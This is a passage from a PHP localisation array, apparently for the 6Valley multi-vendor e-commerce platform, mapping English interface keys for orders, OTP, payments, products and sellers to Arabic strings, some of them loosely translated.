يمكنك تحميل قوالب موضوع 6Valley فقط', 'NB' => 'ملحوظة', 'NB = Keep an OTP variable in your SMS providers OTP Template' => 'NB=> احتفظ بمتغير OTP في قالب SMS SMS الخاص بك', 'NB = XXXX will be replace with otp' => 'NB=> سيتم استبدال xxxx بـ OTP', 'NB= _Image_size_must_be_within_2_MB' => 'NB=> يجب أن يكون حجم الصورة ضمن 2 ميغابايت', 'NB_= _#OTP#_will_be_replace_with_otp' => 'NB=> سيتم استبدال # OTP # بـ OTP', 'NB_= _Keep_an_OTP_variable_in_your_SMS_providers_OTP_Template' => 'NB=> احتفظ بمتغير OTP في قالب SMS SMS الخاص بك', 'NB_= _XXXX_will_be_replace_with_otp' => 'NB=> سيتم استبدال xxxx بـ OTP', 'NEWS LETTER' => 'رسالة إخبارية', 'Name' => 'اسم', 'Name your OAuth 2.0 client' => 'قم بتسمية عميل Oauth 2.0 الخاص بك', 'Nav menu' => 'قائمة NAV', 'Negative' => 'سلبي', 'Network Components' => 'مكونات الشبكة', 'Neutral' => 'حيادي', 'New' => 'جديد', 'New Arrivals' => 'الوافدين الجدد', 'New Currency inserted successfully!' => 'تم إدخال عملة جديدة بنجاح!', 'New Digital Product' => 'منتج رقمي جديد', 'New Product' => 'منتج جديد', 'New Request' => 'طلب جديد', 'New delivery-man' => 'تسليم جديد رجل', 'New notification' => 'إشعار جديد', 'New order ID for you' => 'معرف طلب جديد لك', 'New order received' => 'تم استلام أمر جديد', 'New_Arrivals' => 'الوافدين الجدد', 'New_Seller' => 'بائع جديد', 'New_Sub_Sub_Category' => 'فئة فرعية جديدة جديدة', 'Newsletter' => 'النشرة الإخبارية', 'Next' => 'التالي', 'No' => 'لا', 'No Account' => 'لا حساب', 'No Data found' => 'لاتوجد بيانات', 'No Message available' => 'لا توجد رسائل متاحة', 'No Product Found' => 'لم يتم العثور على منتج', 'No conversation found' => 'لم يتم العثور على محادثة', 'No conversetion found' => 'لم يتم العثور على محادثة', 'No data found' => 'لاتوجد بيانات', 'No data to show' => 'لا توجد بيانات لإظهارها', 'No such data found!' => 'لم يتم العثور على مثل هذه البيانات!', 'No_Discount' => 'لا خصم', 'No_Featured_Product_Found' => 'لم يتم العثور على منتج مميز', 'No_Order_Found' => 'لم يتم العثور على أمر', 'No_Product_Found' => 'لم يتم العثور على منتج', 'No_country_to_deliver' => 'لا يوجد دولة لتقديمها', 'No_data_to_found' => 'لا توجد بيانات يمكن العثور عليها', 'No_data_to_show' => 'لا توجد بيانات لإظهارها', 'No_featured_product_found' => 'لم يتم العثور على منتج مميز', 'No_reply' => 'لا يوجد رد', 'Not_Seen_Yet' => 'لم أر بعد', 'Note' => 'ملحوظة', 'Note about transaction or request' => 'ملاحظة حول المعاملة أو الطلب', 'Notification' => 'إشعار', 'Notification Update' => 'تحديث الإخطار', 'Notification mail for new order received' => 'بريد الإخطار لأمر جديد تم استلامه', 'Notification mail for order placed' => 'البريد الإخطار للحصول على الطلب', 'Notification_Table' => 'جدول الإخطار', 'Now' => 'الآن', 'Now copy' => 'الآن نسخ', 'Now your multi vendor business mode is opening you can add new seller !!' => 'الآن يفتح وضع أعمالك متعدد البائعين ، يمكنك إضافة بائع جديد !!', 'Now go to' => 'اذهب الآن', 'Now_you_can_login' => 'الآن يمكنك تسجيل الدخول', 'Number' => 'رقم', 'OAuth client ID' => 'معرف عميل Oauth', 'OAuth_client_ID' => 'معرف عميل Oauth', 'OFF' => 'عن', 'OK' => 'نعم', 'ON' => 'على', 'OTP' => 'OTP', 'OTP resend time' => 'OTP إعادة تقديم الوقت', 'OTP_&_Login' => 'OTP وتسجيل الدخول', 'OTP_Verification' => 'التحقق من OTP', 'OTP_and_Login_Setup' => 'OTP وإعداد تسجيل الدخول', 'OTP_and_login_setup' => 'OTP وإعداد تسجيل الدخول', 'OTP_has_been_sent_again.' => 'تم إرسال OTP مرة أخرى.', 'OTP_setup' => 'إعداد OTP', 'OTP_verification' => 'التحقق من OTP', 'OVERVIEW' => 'ملخص', 'Oder_Transaction_Statement' => 'بيان معاملة ODER', 'Promotion' => 'عروض', 'Offers_&_Deals' => 'العروض والصفقات', 'Office' => 'مكتب', 'Offline_Payments' => 'مدفوعات غير متصلة بالإنترنت', 'Ofline_Payment_Methods' => 'أساليب الدفع من الخط', 'Ok let me check' => 'حسنا دعني افحص', 'Old' => 'قديم', 'Olga Sheppard' => 'أولغا شيبارد', 'OnGoing' => 'جاري التنفيذ', 'On_Vacation' => 'في عطلة', 'Once deleted you will not be able to recover this' => 'بمجرد حذفك ، لن تتمكن من استرداد هذا', 'Once you have downloaded and filled the format file' => 'بمجرد تنزيل ملف التنسيق وملئه', 'Once you have downloaded and filled the format file upload it in the form below and submit' => 'بمجرد تنزيل وملء ملف Format File ، قم بتحميله في النموذج أدناه وإرساله', 'Once_you_convert_the_point_into_money_then_it_won`t_back_to_point' => 'بمجرد تحويل النقطة إلى المال ، لن تعود إلى النقطة', 'One Referrer Equal To How Much USD' => 'أحد المرجعين يساوي مقدار الدولار الأمريكي', 'Ongoing_Orders' => 'أوامر مستمرة', 'Online Shop' => 'متجر على الانترنت', 'Online Shopping' => 'التسوق عبر الانترنت', 'Online_Shopping' => 'التسوق عبر الانترنت', 'Open' => 'يفتح', 'Open Your Store' => 'افتح متجرك', 'Open_Your_Store' => 'افتح متجرك', 'Open_your_and_start_selling.' => 'افتحك وابدأ البيع.', 'Optional' => 'خياري', 'Order' => 'طلب', 'Order Complete' => 'الطلب جاهز', 'Order Confirmation Message' => 'رسالة تأكيد الطلب', 'Order Delivered Message' => 'طلب رسالة تسليمها', 'Order Details' => 'تفاصيل الطلب', 'Order Failed Message' => 'رسالة فاشلة الطلب', 'Order ID' => 'رقم التعريف الخاص بالطلب', 'Order List' => 'لائحة الطلبات', 'Order No' => 'أمر لا', 'Order Pending Message' => 'طلب رسالة معلقة', 'Order Placed' => 'تم الطلب', 'Order Processing Message' => 'طلب رسالة معالجة', 'Order Report' => 'تقرير الطلب', 'Order Returned Message' => 'ترتيب الرسالة التي تم إرجاعها', 'Order Shipped' => 'ترتيب شحن', 'Order Statistics' => 'إحصائيات الطلب', 'Order Status' => 'حالة الطلب', 'Order Table' => 'جدول الطلب', 'Order Wise Shipping Method deleted successfully' => 'طلب طريقة الشحن الحكيمة تم حذفها بنجاح', 'Order details' => 'تفاصيل الطلب', 'Order is already delivered You can not change it' => 'تم تسليم الطلب بالفعل لا يمكنك تغييره', 'Order is already delivered You can not change it !!' => 'تم تسليم الطلب بالفعل لا يمكنك تغييره !!', 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation' => 'تم تسليم الطلب بالفعل وقد تم صرف مبلغ المعاملة المتغيرة يمكن أن يكون سبب سوء تقدير', 'Order out for delivery Message' => 'اطلب رسالة التسليم', 'Order placed' => 'تم الطلب', 'Order#' => 'طلب#', 'Order_&_Shipping_Info' => 'معلومات الطلب والشحن', 'Order_&_Shipping_Info ' => 'معلومات الطلب والشحن', 'Order_Again' => 'أجل مرة أخرى', 'Order_Amount' => 'كمية الطلب', 'Order_Complete' => 'الطلب جاهز', 'Order_Created_At' => 'ترتيب تم إنشاؤه في', 'Order_Date' => 'تاريخ الطلب', 'Order_Delivered' => 'أجل تسليم', 'Order_Details' => 'تفاصيل الطلب', 'Order_ID' => 'رقم التعريف الخاص بالطلب', 'Order_Invoice' => 'طلب فاتورة', 'Order_Management' => 'إدارة الطلبات', 'Order_Placed' => 'تم الطلب', 'Order_Received_Notify_Seller' => 'تم استلام الطلب البائع', 'Order_Report' => 'تقرير الطلب', 'Order_Settings' => 'إعدادات الطلب', 'Order_Statistics' => 'إحصائيات الطلب', 'Order_Status' => 'حالة الطلب', 'Order_Summary' => 'ملخص الطلب', 'Order_Transactions' => 'المعاملات أمر', 'Order_Wise_Shipping_Method_deleted_successfully' => 'طلب طريقة الشحن الحكيمة تم حذفها بنجاح', 'Order_cancelation_availablity' => 'طلب إلغاء التوفر', 'Order_delivered' => 'أجل تسليم', 'Order_details_id' => 'اطلب تفاصيل معرف', 'Order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'تم تسليم الطلب بالفعل وقد تم صرف مبلغ المعاملات المتغيرة يمكن أن يكون سبب سوء التقدير', 'Order_is_on_the_way' => 'النظام في الطريق', 'Order_list' => 'لائحة الطلبات', 'Order_placed' => 'تم الطلب', 'Ordered_Items' => 'العناصر المطلوبة', 'Orders' => 'طلبات', 'Orders Served' => 'أوامر الخدم', 'Other' => 'آخر', 'Other s_Store' => 'متجر آخر', 'Others' => 'آحرون', 'Others_Store' => 'متجر آخرون', 'Out_For_Delivery' => 'خارج للتوصيل', 'Out_Of_Stock' => 'إنتهى من المخزن', 'Out_of_Stock' => 'إنتهى من المخزن', 'Out_of_Stock_Products' => 'من منتجات الأسهم', 'Out_of_stock' => 'إنتهى من المخزن', 'Outdoor Fun & Sports' => 'المرح في الهواء الطلق والرياضة', 'Overall' => 'إجمالي', 'Overall Statistics' => 'الإحصاءات الشاملة', 'Overall_statistics' => 'الإحصاءات الشاملة', 'Overview' => 'ملخص', 'PAYMENT_METHOD' => 'طريقة الدفع او السداد', 'PAYMENT_METHODS' => 'طرق الدفع', 'POS' => 'نقاط البيع', 'POS Order List' => 'قائمة أوامر نقاط البيع', 'POS_Orders' => 'أوامر POS', 'POS_order' => 'ترتيب نقاط', 'PURCHASE_CODE' => 'كود شراء', 'Packaging' => 'التغليف', 'Packaging order' => 'أمر التغليف', 'Packaging_order' => 'أمر التغليف', 'Page Not found' => 'الصفحة غير موجودة', 'Pages_&_Media' => 'الصفحات والوسائط', 'Paid' => 'مدفوع', 'Paid By' => 'دفعت بواسطة', 'Paid Phone Number' => 'رقم هاتف مدفوع', 'Paid_by' => 'دفعت بواسطة', 'Partner request' => 'طلب الشريك', 'Password' => 'كلمة المرور', 'Password Reset' => 'إعادة تعيين كلمة المرور', 'Password doesn t Match' => 'كلمة المرور لا تتطابق', 'Password_Reset_Mail' => 'إعادة تعيين كلمة المرور', 'Password_doesn t_Match' => 'كلمة المرور لا تتطابق', 'Passwords do not match' => 'كلمة المرور غير مطابقة', 'Passwords match' => 'كلمات السر متطابقة', 'Passwords_do_not_match' => 'كلمة المرور غير مطابقة', 'Passwords_match' => 'كلمات السر متطابقة', 'Pay_with_secure_Digital_payment_gateways' => 'ادفع مع بوابات الدفع الرقمية الآمنة', 'Payer Name' => 'اسم الدافع', 'Payment' => 'قسط', 'Payment Method' => 'طريقة الدفع او السداد', 'Payment Setup' => 'إعداد الدفع', 'Payment Statistics' => 'إحصائيات الدفع', 'Payment Status' => 'حالة السداد', 'Payment_Details' => 'بيانات الدفع', 'Payment_History' => 'سجل الدفع', 'Payment_Information' => 'معلومات الدفع', 'Payment_Method' => 'طريقة الدفع او السداد', 'Payment_Methods' => 'طرق الدفع', 'Payment_Note' => 'مذكرة الدفع', 'Payment_Option' => 'خيار الدفع', 'Payment_Statistics' => 'إحصائيات الدفع', 'Payment_Status' => 'حالة السداد', 'Payments' => 'المدفوعات', 'Payments Amount' => 'مبلغ المدفوعات', 'Paypal' => 'PayPal', 'Paypal_Client_ID' => 'معرف العميل PayPal', 'Pending' => 'قيد الانتظار', 'Pending Request' => 'طلب معلق', 'Pending Withdraws' => 'معلقة الانسحاب', 'Pending_Products' => 'المنتجات المعلقة', 'Pending_Refund_Requests' => 'في انتظار طلبات الاسترداد', 'Pending_Withdraw' => 'في انتظار سحب', 'Pending_Withdraws' => 'معلقة الانسحاب', 'Percent' => 'نسبه مئويه', 'Permanent' => 'دائم', 'Personal_Details' => 'تفاصيل شخصية', 'Phone' => 'هاتف', 'Phone Case' => 'غطاء هاتف', 'Phones & Telecom' => 'الهواتف والاتصالات', 'Physical Product' => 'المنتج المادي', 'Pinterest' => 'بينتيريست', 'Place_Order' => 'مكان الامر', 'Placeholder' => 'عنصر نائب', 'Please ReType Password' => 'يرجى إعادة تربية كلمة المرور', 'Please check the recaptcha' => 'يرجى التحقق من recaptcha', 'Please choose all the options' => 'الرجاء اختيار كل الخيارات', 'Please enter valid email address' => 'الرجاء إدخال عنوان بريد إلكتروني صالح', 'Please enter your first name' => 'يرجى ادخال الاسم الاول', 'Please enter your last name' => 'الرجاء إدخال اسمك الأخير', 'Please enter your phone number' => 'يرجى إدخال رقم الهاتف الخاص بك', 'Please fill all required fields' => 'يرجى تعبئة جميع الحقول المطلوبة', 'Please fill all required fields of shipping address' => 'يرجى ملء جميع حقول الشحن المطلوبة', 'Please fill all required fields of shipping/billing address' => 'يرجى ملء جميع الحقول المطلوبة للشحن/عنوان الفواتير', 'Please fill all444 required fields' => 'يرجى ملء All444 الحقول المطلوبة', 'Please go back to the homepage' => 'يرجى العودة إلى الصفحة الرئيسية', 'Please only input png or jpg type file' => 'يرجى فقط إدخال ملف نوع PNG أو JPG', 'Please provide valid email address' => 'يرجى تقديم عنوان بريد إلكتروني صالح', 'Please write the message' => 'الرجاء كتابة الرسالة', 'Please_ReType_Password' => 'الرجاء إعادة إعادة كلمة المرور', 'Please_Verify_that_itâs_you' => 'يرجى التحقق من أنه أنت', 'Please_check_the_recaptcha' => 'يرجى التحقق من recaptcha', 'Please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'يرجى تأكيد حسابك الذي تم التحقق منه للدفع من خلال حسابك المصرفي', 'Please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'يرجى الاتصال بـ DeliveryMan لتأكيد راتبك واستلام طلبك.', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_email' => 'الرجاء إدخال OTP في الحقل أدناه للتحقق من بريدك الإلكتروني', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_phone' => 'الرجاء إدخال OTP في الحقل أدناه للتحقق من هاتفك', 'Please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'من فضلك ، تأكد من تحديث جميع رسوم تسليم المنتجات.', 'Please_send_a_Feedback' => 'الرجاء إرسال ملاحظات', 'Please_type_verify_code' => 'الرجاء كتابة الكود التحقق', 'Plese come back later' => 'يعود بليز لاحقًا', 'Point_Transaction_History' => 'تاريخ المعاملة النقطة', 'Poor' => 'فقير', 'Popular_Tags' => 'الكلمات الشعبية', 'Popup Banner' => 'لافتة منبثقة', 'Popup_Banner' => 'لافتة منبثقة', 'Popup_Banner_updated_Successfully' => 'تم تحديث لافتة منبثقة بنجاح', 'Portable Air Conditioner' => 'مكيف هواء محمول', 'Position' => 'موضع', 'Positive' => 'إيجابي', 'Positive_Review' => 'مراجعة إيجابية', 'Power supply unit' => 'وحدة امدادات الطاقة', 'Preparing Shipment' => 'إعداد الشحنة', 'Preparing_for_shipment' => 'التجهيز للشحن', 'Press' => 'يضعط', 'Press_Submit' => 'إرسال إرسال', 'Previous' => 'سابق', 'Price' => 'سعر', 'Price_Range' => 'نطاق السعر', 'Pricing_&_others' => 'التسعير والآخرين', 'Primary' => 'أساسي', 'Primary_Color' => 'لون أصلي', 'Primary_Light_Color' => 'لون الضوء الأساسي', 'Print' => 'مطبعة', 'Print Invoice' => 'فاتورة طباعة', 'Print invoice' => 'فاتورة طباعة', 'Printer' => 'طابعة', 'Priority' => 'أولوية', 'Privacy Policy' => 'سياسة الخصوصية', 'Privacy policy' => 'سياسة الخصوصية', 'Privacy_Policy' => 'سياسة الخصوصية', 'Pro Plus 32 Inch Android Smart Wifi Hd Led Tv 4k Supported' => 'Pro Plus 32 بوصة Android WiFi HD LED TV 4K مدعوم', 'Proceed_To_Checkout' => 'الشروع في الخروج', 'Proceed_To_Next' => 'انتقل إلى التالي', 'Proceed_to_Next' => 'انتقل إلى التالي', 'Processing' => 'يعالج', 'Proddduct 2' => 'proddduct 2', 'Product' => 'منتج', 'Product Add' => 'إضافة المنتج', 'Product Brand on/off' => 'العلامة التجارية للمنتج تشغيل/إيقاف', 'Product Bulk Import' => 'المنتج بالجملة استيراد', 'Product Discount' => 'خصم المنتج', 'Product Edit' => 'تحرير المنتج', 'Product ID is required!' => 'معرف المنتج مطلوب!', 'Product Image' => 'صورة المنتج', 'Product List' => 'قائمة المنتج', 'Product Name' => 'اسم المنتج', 'Product Preview' => 'معاينة المنتج', 'Product Report' => 'تقرير المنتج', 'Product Review' => 'تقييم المنتج', 'Product Successfully Returned' => 'تم إرجاع المنتج بنجاح', 'Product Type' => 'نوع المنتج', 'Product Unit Price' => 'سعر وحدة المنتج', 'Product added successfully!' => 'وأضاف المنتج بنجاح!', 'Product already added in cart' => 'تم إضافة المنتج بالفعل في العربة', 'Product already added to wishlist' => 'تم إضافة المنتج بالفعل إلى قائمة الأمنيات', 'Product has been added to wishlist' => 'تمت إضافة المنتج إلى قائمة الأمنيات', 'Product images is required!' => 'صور المنتج مطلوب!', 'Product in Wishlist Report' => 'منتج في تقرير قائمة الأمنيات', 'Product in wishlist report' => 'منتج في تقرير قائمة الأمنيات', 'Product name is required!' => 'اسم المنتج مطلوب!', 'Product price & stock' => 'سعر المنتج والسهم', 'Product reviews' => 'تعليقات المنتج', 'Product stock Report' => 'تقرير أسهم المنتج', 'Product stock report' => 'تقرير أسهم المنتج', 'Product thumbnail is required!' => 'مصغرة المنتج مطلوب!', 'Product_Attributes' => 'سمات المنتج', 'Product_Brand' => 'العلامة التجارية المنتج', 'Product_Comparison' => 'مقارنة السلعة', 'Product_Details' => 'تفاصيل المنتج', 'Product_Discount' => 'خصم المنتج', 'Product_List' => 'قائمة المنتج', 'Product_List_Page' => 'صفحة قائمة المنتج', 'Product_Management' => 'ادارة المنتج', 'Product_Name' => 'اسم المنتج', 'Product_Report' => 'تقرير المنتج', 'Product_Section' => 'قسم المنتج', 'Product_Statistics' => 'إحصائيات المنتج', 'Product_Stock' => 'مخزون المنتج', 'Product_Successfully_Returned' => 'تم إرجاع المنتج بنجاح', 'Product_Unit_Price' => 'سعر وحدة المنتج', 'Product_has_been_added_to_Compare_list' => 'تمت إضافة المنتج لمقارنة قائمة', 'Product_must_be_approved' => 'يجب الموافقة على المنتج', 'Product_not_uploaded_yet' => 'المنتج لم يتم تحميله بعد', 'Product_price_&_stock' => 'سعر المنتج والسهم', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'لا يمكن أن تكون كمية المنتج صفرًا أو أقل من الصفر في العربة', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart!' => 'لا يمكن أن تكون كمية المنتج صفرًا أو أقل من الصفر في العربة!', 'Product_quantity_updated' => 'تم تحديث كمية المنتج', 'Product_quantity_updated!' => 'تم تحديث كمية المنتج!', 'Product_review_not_available' => 'مراجعة المنتج غير متوفرة', 'Product_reviews' => 'تعليقات المنتج', 'Products' => 'منتجات', 'Products_Stock' => 'منتجات المنتجات', 'Profile' => 'حساب تعريفي', 'Profile Settings' => 'إعدادات الملف الشخصي', 'Profile_Image' => 'صورة الملف الشخصي', 'Profile_Info' => 'معلومات الشخصي', 'Promo_Code' => 'رمز ترويجي', 'Promotion_Management' => 'إدارة الترويج', 'Promotional_Banners' => 'لافتات ترويجية', 'Provide' => 'يمد', 'Provide Primary Email and press' => 'توفير البريد الإلكتروني الأساسي والضغط', 'Published' => 'نشرت', 'Purchase' => 'شراء', 'Purchase price' => 'سعر الشراء', 'Purchase_price' => 'سعر الشراء', 'Purchese price' => 'شراء السعر', 'Push Messages' => 'دفع الرسائل', 'Push Notification Setup' => 'دفع الإخطار', 'Push a description and also identifier and Continue' => 'ادفع وصفًا وأيضًا معرفًا ومتابعة', 'Push_Notification' => 'إشعار دفع', 'Push_Notification_Setup' => 'دفع الإخطار', 'Put a description and also identifier (identifier that used for app) and this is the' => 'ضع وصفًا ومعرفًا أيضًا (المعرف المستخدم للتطبيق) وهذا هو', 'Q' => 'س', 'QTY' => 'كتي', 'Qty' => 'كتي', 'Quantity' => 'كمية', 'Question' => 'سؤال', 'Quick' => 'سريع', 'Quick_Links' => 'روابط سريعة', 'Quick_View' => 'نظرة سريعة', 'REVIEWS' => 'المراجعات', 'RTL' => 'RTL', 'Ranking' => 'تصنيف', 'Rating' => 'تقييم', 'Ratings' => 'تقييمات', 'Ratio' => 'نسبة', 'Ratio_1= 1' => 'نسبة 1=> 1', 'Re-Order_Level' => 'مستوى إعادة الطلب', 'ReCAPTCHA Failed' => 'فشل ريكابتشا', 'ReCAPTCHA_Failed' => 'فشل ريكابتشا', 'Reached maximum' => 'وصلت إلى الحد الأقصى', 'Ready After Sell' => 'جاهز بعد البيع', 'Ready Product' => 'منتج جاهز', 'Ready to Leave' => 'على استعداد للمغادرة', 'Ready_After_Sell' => 'جاهز بعد البيع', 'Ready_Product' => 'منتج جاهز', 'Recaptcha' => 'recaptcha', 'Recommended' => 'مُستَحسَن', 'Recommended_For_You' => 'موصى به لك', 'Recommended_for_You' => 'موصى به لك', 'Redirecting_to_the_payment' => 'إعادة التوجيه إلى الدفع', 'Redirecting_to_the_payment_page' => 'إعادة توجيه صفحة الدفع', 'Refer_&_Earn' => 'الرجوع والكسب', 'Refer_Code' => 'الرجوع إلى الرمز', 'Reference' => 'مرجع', 'Refrigerator' => 'ثلاجة', 'Refund' => 'استرداد', 'Refund Details' => 'تفاصيل استرداد', 'Refund Given' => 'استرداد', 'Refund Policy' => 'سياسة الاسترجاع', 'Refund Rate' => 'معدل استرداد', 'Refund request' => 'طلب ارجاع', 'Refund_Details' => 'تفاصيل استرداد', 'Refund_Given' => 'استرداد', 'Refund_Order_Validity' => 'استرداد صحة الطلب', 'Refund_Policy' => 'سياسة الاسترجاع', 'Refund_Request' => 'طلب ارجاع', 'Refund_Request_List' => 'قائمة طلب الاسترداد', 'Refund_Requests' => 'طلبات الاسترداد', 'Refund_Transactions' => 'معاملات استرداد', 'Refund_reason' => 'سبب استرداد', 'Register' => 'يسجل', 'Rejected' => 'مرفوض', 'Remove' => 'يزيل', 'Remove_All' => 'حذف الكل', 'Removed' => 'إزالة', 'Reorder' => 'إعادة ترتيب', 'Repeat' => 'يكرر', 'Reply_from_admin' => 'الرد من المشرف', 'Report' => 'تقرير', 'Report_&_Analytics' => 'التقرير والتحليلات', 'Reports' => 'التقارير', 'Reports_&_Analysis' => 'التقارير والتحليل', 'Reports_&_Analytics' => 'التقارير والتحليلات', 'Request' => 'طلب', 'Resend_OTP' => 'إعادة إرسال OTP', 'Resend_code_within' => 'إعادة تقديم رمز في الداخل', 'Reset' => 'إعادة ضبط', 'Reset Your password' => 'اعد ضبط كلمه السر', 'Return Policy' => 'سياسة العائدات', 'Return_Policy' => 'سياسة العائدات', 'Returned' => 'عاد', 'Review' => 'مراجعة', 'Review List' => 'قائمة المراجعة', 'Review_list' => 'قائمة المراجعة', 'Reviewer' => 'المراجع', 'Reviews' => 'المراجعات', 'Right' => 'يمين', 'Road' => 'طريق', 'Role' => 'دور', 'Role Update' => 'تحديث الأدوار', 'Role_Update' => 'تحديث الأدوار', 'Role_deleted_successfully' => 'تم حذف الدور بنجاح', 'Router' => 'جهاز التوجيه', 'Royal Crown' => 'التاج الملكي', 'Running Shoes' => 'أحذية الجري', 'SKU' => 'SKU', 'SL' => 'SL', 'SL#' => 'SL#', 'SMS Module Setup' => 'إعداد وحدة الرسائل القصيرة', 'SMS_Config' => 'تكوين الرسائل القصيرة', 'SMS_Gateway_Title' => 'SMS Gateway Title', 'SMS_Module_Setup' => 'إعداد وحدة الرسائل القصيرة', 'SMS_gateway_title' => 'SMS Gateway Title', 'SSD' => 'SSD', 'SSLCOMMERZ' => 'SSLCommerz', 'SUPPORT TICKET ANSWER' => 'دعم الإجابة تذكرة', 'Safe Payment' => 'الدفع الآمن', 'Sales Commission' => 'لجنة المبيعات', 'Sales_&_Transaction_Report' => 'تقرير المبيعات والمعاملات', 'Sales_Statistics' => 'إحصائيات المبيعات', 'Same_as_Delivery_Address' => 'نفس عنوان التسليم', 'Save' => 'يحفظ', 'Save Changes' => 'حفظ التغييرات', 'Save changes' => 'حفظ التغييرات', 'Save_This_Address' => 'احفظ هذا العنوان', 'Save_this_Address' => 'احفظ هذا العنوان', 'Saved Addresses' => 'العناوين المحفوظة', 'Saved_Addresses' => 'العناوين المحفوظة', 'Search' => 'يبحث', 'Search Currency Name or Currency Code' => 'البحث عن اسم العملة أو رمز العملة', 'Search Data' => 'بيانات البحث', 'Search Product' => 'بحث المنتج', 'Search Product Name' => 'بحث اسم المنتج', 'Search Products' => 'البحث عن المنتجات', 'Search Ticket by Subject or status...' => 'ابحث عن تذكرة حسب الموضوع أو الحالة ...', 'Search by ID...' => 'البحث عن طريق الهوية ...', 'Search by Name' => 'البحث عن طريق الإسم', 'Search by Name or Email or Phone' => 'ابحث بالاسم أو البريد الإلكتروني أو الهاتف', 'Search by Name or Phone or Email' => 'ابحث بالاسم أو الهاتف أو البريد الإلكتروني', 'Search by Order ID' => 'البحث حسب معرف الطلب', 'Search by Product Name' => 'البحث باسم المنتج', 'Search by Product or Customer' => 'ابحث حسب المنتج أو العميل', 'Search by Sub Sub Category' => 'البحث عن طريق الفئة الفرعية الفرعية', 'Search by Subject' => 'البحث حسب الموضوع', 'Search by Title' => 'البحث عن طريق العنوان', 'Search by Title or Code or Discount Type' => 'ابحث حسب العنوان أو الرمز أو نوع الخصم', 'Search by orders id' => 'ابحث حسب أوامر معرف', 'Search by orders id _or_refund_id' => 'ابحث عن طريق معرف الطلبات أو معرف الاسترداد', 'Search by orders id or order_details_id' => 'ابحث عن طريق معرف الطلبات أو معرف تفاصيل الطلب', 'Search by orders id or transaction id' => 'ابحث عن طريق معرف الطلبات أو معرف المعاملة', 'Search by product name or bar code' => 'ابحث باسم المنتج أو الرمز الشريطي', 'Search by sores' => 'البحث عن طريق القروح', 'Search here ...' => 'ابحث هنا ...', 'Search orders' => 'تقسيمات البحث', 'Search products from this store' => 'البحث عن منتجات من هذا المتجر', 'Search...' => 'يبحث...', 'Search_Data' => 'بيانات البحث', 'Search_Method_Name' => 'اسم طريقة البحث', 'Search_Product' => 'بحث المنتج', 'Search_Products' => 'البحث عن المنتجات', 'Search_Store' => 'متجر البحث', 'Search_by_Attribute_Name' => 'البحث عن طريق اسم السمة', 'Search_by_Banner_Type' => 'ابحث حسب نوع الراية', 'Search_by_Name' => 'البحث عن طريق الإسم', 'Search_by_Name_or_Category' => 'البحث بالاسم أو الفئة', 'Search_by_Name_or_Mobile_No_or_Email' => 'ابحث بالاسم أو الهاتف المحمول أو البريد الإلكتروني', 'Search_by_Order_ID_or_Transaction_ID' => 'البحث حسب معرف الطلب أو معرف المعاملة', 'Search_by_Sub_Category' => 'البحث عن طريق الفئة الفرعية', 'Search_by_Sub_Sub_Category' => 'البحث عن طريق الفئة الفرعية الفرعية', 'Search_by_email' => 'ابحث عن طريق البريد الإلكتروني', 'Search_by_order_id' => 'البحث حسب معرف الطلب', 'Search_by_order_id_or_order_details_id' => 'ابحث حسب معرف الطلب أو معرف تفاصيل الطلب', 'Search_by_order_id_or_refund_id' => 'البحث حسب معرف الطلب أو معرف الاسترداد', 'Search_customers...' => 'بحث العملاء ...', 'Search_for_items' => 'ابحث عن العناصر', 'Search_for_items_or_store' => 'ابحث عن العناصر أو المتجر', 'Second step' => 'الخطوة الثانية', 'Secondary' => 'ثانوي', 'Secondary Color' => 'اللون الثانوي', 'Secondary_Banner_updated_Successfully' => 'تم تحديث لافتة ثانوية بنجاح', 'Secret' => 'سر', 'Secret Covered in Sand Comic book pdf' => 'السر المغطى في الكتاب الهزلي الرملي pdf', 'Secret Key' => 'المفتاح السري', 'See the latest deals and exciting new offers' => 'شاهد أحدث الصفقات والعروض الجديدة المثيرة', 'See_All' => 'اظهار الكل', 'See_Credential_Setup_Instructions' => 'انظر تعليمات إعداد بيانات الاعتماد', 'See_Less' => 'انظر أقل', 'See_More' => 'شاهد المزيد', 'See_all' => 'اظهار الكل', 'Seen' => 'مرئي', 'Select' => 'يختار', 'Select Logout below if you are ready to end your current session' => 'حدد تسجيل الدخول أدناه إذا كنت مستعدًا لإنهاء جلستك الحالية', 'Select All' => 'اختر الكل', 'Select Country code' => 'حدد رمز البلد', 'Select Coupon Type' => 'حدد نوع القسيمة', 'Select Customer' => 'حدد العميل', 'Select Product' => 'حدد المنتج', 'Select Seller' => 'حدد البائع', 'Select Time Period' => 'حدد الفترة الزمنية', 'Select an app type' => 'حدد نوع التطبيق', 'Select an app type and press' => 'حدد نوع التطبيق واضغط', 'Select product' => 'حدد المنتج', 'Select reCAPTCHA v2 as' => 'حدد recaptcha v2', 'Select the' => 'حدد', 'Select your desire category' => 'حدد فئة الرغبة الخاصة بك', 'Select_All' => 'اختر الكل', 'Select_Category' => 'اختر الفئة', 'Select_City' => 'اختر مدينة', 'Select_Country' => 'حدد الدولة', 'Select_From_Saved' => 'اختر من المحفوظ', 'Select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'حدد تسجيل الدخول أدناه إذا كنت مستعدًا لإنهاء جلستك الحالية', 'Select_Payment_Method' => 'اختار طريقة الدفع', 'Select_Withdraw_Method' => 'حدد طريقة سحب', 'Select_coupon_bearer' => 'حدد حامل القسيمة', 'Select_coupon_type' => 'حدد نوع القسيمة', 'Select_customer' => 'حدد العميل', 'Select_main_category' => 'حدد الفئة الرئيسية', 'Select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'حدد recaptcha v2 كنوع recaptcha', 'Seller' => 'تاجر', 'Seller Apply' => 'البائع تطبيق', 'Seller Info' => 'معلومات البائع', 'Seller Information' => 'معلومات البائع', 'Seller List' => 'قائمة البائع', 'Seller Orders' => 'أوامر البائع', 'Seller POS' => 'بائع نقاط', 'Seller POS permission on/off' => 'البائع POS إذن ON/OFF', 'Seller Products' => 'منتجات البائع', 'Seller Registration' => 'تسجيل البائع', 'Seller Registration on/off' => 'تسجيل البائع/إيقاف 